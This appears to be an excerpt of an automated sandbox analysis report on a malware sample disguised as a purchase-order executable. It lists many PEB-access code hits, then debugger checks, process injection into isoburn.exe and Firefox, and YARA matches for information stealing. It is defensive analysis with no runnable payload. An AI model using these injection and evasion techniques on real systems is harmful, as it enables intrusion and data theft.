            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0770 mov eax, dword ptr fs:[00000030h]3_2_018F0770
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4690 mov eax, dword ptr fs:[00000030h]3_2_018E4690
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4690 mov eax, dword ptr fs:[00000030h]3_2_018E4690
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019166B0 mov eax, dword ptr fs:[00000030h]3_2_019166B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C6A6 mov eax, dword ptr fs:[00000030h]3_2_0191C6A6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0191A6C7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A6C7 mov eax, dword ptr fs:[00000030h]3_2_0191A6C7
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E6F2 mov eax, dword ptr fs:[00000030h]3_2_0195E6F2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019606F1 mov eax, dword ptr fs:[00000030h]3_2_019606F1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019606F1 mov eax, dword ptr fs:[00000030h]3_2_019606F1
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F260B mov eax, dword ptr fs:[00000030h]3_2_018F260B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922619 mov eax, dword ptr fs:[00000030h]3_2_01922619
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E609 mov eax, dword ptr fs:[00000030h]3_2_0195E609
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E262C mov eax, dword ptr fs:[00000030h]3_2_018E262C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FE627 mov eax, dword ptr fs:[00000030h]3_2_018FE627
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01916620 mov eax, dword ptr fs:[00000030h]3_2_01916620
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918620 mov eax, dword ptr fs:[00000030h]3_2_01918620
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018FC640 mov eax, dword ptr fs:[00000030h]3_2_018FC640
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01912674 mov eax, dword ptr fs:[00000030h]3_2_01912674
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A660 mov eax, dword ptr fs:[00000030h]3_2_0191A660
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A660 mov eax, dword ptr fs:[00000030h]3_2_0191A660
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A866E mov eax, dword ptr fs:[00000030h]3_2_019A866E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A866E mov eax, dword ptr fs:[00000030h]3_2_019A866E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E09AD mov eax, dword ptr fs:[00000030h]3_2_018E09AD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E09AD mov eax, dword ptr fs:[00000030h]3_2_018E09AD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov esi, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov eax, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019689B3 mov eax, dword ptr fs:[00000030h]3_2_019689B3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F29A0 mov eax, dword ptr fs:[00000030h]3_2_018F29A0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019149D0 mov eax, dword ptr fs:[00000030h]3_2_019149D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA9D3 mov eax, dword ptr fs:[00000030h]3_2_019AA9D3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019769C0 mov eax, dword ptr fs:[00000030h]3_2_019769C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EA9D0 mov eax, dword ptr fs:[00000030h]3_2_018EA9D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019129F9 mov eax, dword ptr fs:[00000030h]3_2_019129F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019129F9 mov eax, dword ptr fs:[00000030h]3_2_019129F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E9E0 mov eax, dword ptr fs:[00000030h]3_2_0196E9E0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C912 mov eax, dword ptr fs:[00000030h]3_2_0196C912
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8918 mov eax, dword ptr fs:[00000030h]3_2_018D8918
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018D8918 mov eax, dword ptr fs:[00000030h]3_2_018D8918
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E908 mov eax, dword ptr fs:[00000030h]3_2_0195E908
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E908 mov eax, dword ptr fs:[00000030h]3_2_0195E908
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196892A mov eax, dword ptr fs:[00000030h]3_2_0196892A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0197892B mov eax, dword ptr fs:[00000030h]3_2_0197892B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01960946 mov eax, dword ptr fs:[00000030h]3_2_01960946
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984978 mov eax, dword ptr fs:[00000030h]3_2_01984978
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984978 mov eax, dword ptr fs:[00000030h]3_2_01984978
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C97C mov eax, dword ptr fs:[00000030h]3_2_0196C97C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01906962 mov eax, dword ptr fs:[00000030h]3_2_01906962
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov eax, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov edx, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E mov eax, dword ptr fs:[00000030h]3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0887 mov eax, dword ptr fs:[00000030h]3_2_018E0887
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C89D mov eax, dword ptr fs:[00000030h]3_2_0196C89D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190E8C0 mov eax, dword ptr fs:[00000030h]3_2_0190E8C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C8F9 mov eax, dword ptr fs:[00000030h]3_2_0191C8F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191C8F9 mov eax, dword ptr fs:[00000030h]3_2_0191C8F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019AA8E4 mov eax, dword ptr fs:[00000030h]3_2_019AA8E4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196C810 mov eax, dword ptr fs:[00000030h]3_2_0196C810
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0191A830 mov eax, dword ptr fs:[00000030h]3_2_0191A830
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198483A mov eax, dword ptr fs:[00000030h]3_2_0198483A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198483A mov eax, dword ptr fs:[00000030h]3_2_0198483A
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov ecx, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01902835 mov eax, dword ptr fs:[00000030h]3_2_01902835
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01910854 mov eax, dword ptr fs:[00000030h]3_2_01910854
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4859 mov eax, dword ptr fs:[00000030h]3_2_018E4859
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E4859 mov eax, dword ptr fs:[00000030h]3_2_018E4859
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E872 mov eax, dword ptr fs:[00000030h]3_2_0196E872
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196E872 mov eax, dword ptr fs:[00000030h]3_2_0196E872
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976870 mov eax, dword ptr fs:[00000030h]3_2_01976870
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976870 mov eax, dword ptr fs:[00000030h]3_2_01976870
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994BB0 mov eax, dword ptr fs:[00000030h]3_2_01994BB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994BB0 mov eax, dword ptr fs:[00000030h]3_2_01994BB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0BBE mov eax, dword ptr fs:[00000030h]3_2_018F0BBE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018F0BBE mov eax, dword ptr fs:[00000030h]3_2_018F0BBE
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E0BCD mov eax, dword ptr fs:[00000030h]3_2_018E0BCD
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198EBD0 mov eax, dword ptr fs:[00000030h]3_2_0198EBD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01900BCB mov eax, dword ptr fs:[00000030h]3_2_01900BCB
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196CBF0 mov eax, dword ptr fs:[00000030h]3_2_0196CBF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EBFC mov eax, dword ptr fs:[00000030h]3_2_0190EBFC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8BF0 mov eax, dword ptr fs:[00000030h]3_2_018E8BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195EB1D mov eax, dword ptr fs:[00000030h]3_2_0195EB1D
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EB20 mov eax, dword ptr fs:[00000030h]3_2_0190EB20
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0190EB20 mov eax, dword ptr fs:[00000030h]3_2_0190EB20
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8B28 mov eax, dword ptr fs:[00000030h]3_2_019A8B28
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019A8B28 mov eax, dword ptr fs:[00000030h]3_2_019A8B28
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0198EB50 mov eax, dword ptr fs:[00000030h]3_2_0198EB50
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994B4B mov eax, dword ptr fs:[00000030h]3_2_01994B4B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01994B4B mov eax, dword ptr fs:[00000030h]3_2_01994B4B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976B40 mov eax, dword ptr fs:[00000030h]3_2_01976B40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01976B40 mov eax, dword ptr fs:[00000030h]3_2_01976B40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01988B42 mov eax, dword ptr fs:[00000030h]3_2_01988B42
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DCB7E mov eax, dword ptr fs:[00000030h]3_2_018DCB7E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01918A90 mov edx, dword ptr fs:[00000030h]3_2_01918A90
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018EEA80 mov eax, dword ptr fs:[00000030h]3_2_018EEA80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019B4A80 mov eax, dword ptr fs:[00000030h]3_2_019B4A80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8AA0 mov eax, dword ptr fs:[00000030h]3_2_018E8AA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E8AA0 mov eax, dword ptr fs:[00000030h]3_2_018E8AA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01936AA4 mov eax, dword ptr fs:[00000030h]3_2_01936AA4
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01914AD0 mov eax, dword ptr fs:[00000030h]3_2_01914AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01914AD0 mov eax, dword ptr fs:[00000030h]3_2_01914AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\isoburn.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Code function: 3_2_004173F3 LdrLoadDll, 3_2_004173F3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Section loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Section loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Memory written: C:\Users\user\Desktop\PO_YTWHDF3432.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\isoburn.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\isoburn.exe; Thread APC queued: target process: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Process created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exe
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe; Process created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: EProgram Manager
            Source: qNENczArVjafOgvC.exe, 0000000A.00000002.3731310357.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000000.1296814480.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732050038.0000000001831000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Users\user\Desktop\PO_YTWHDF3432.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
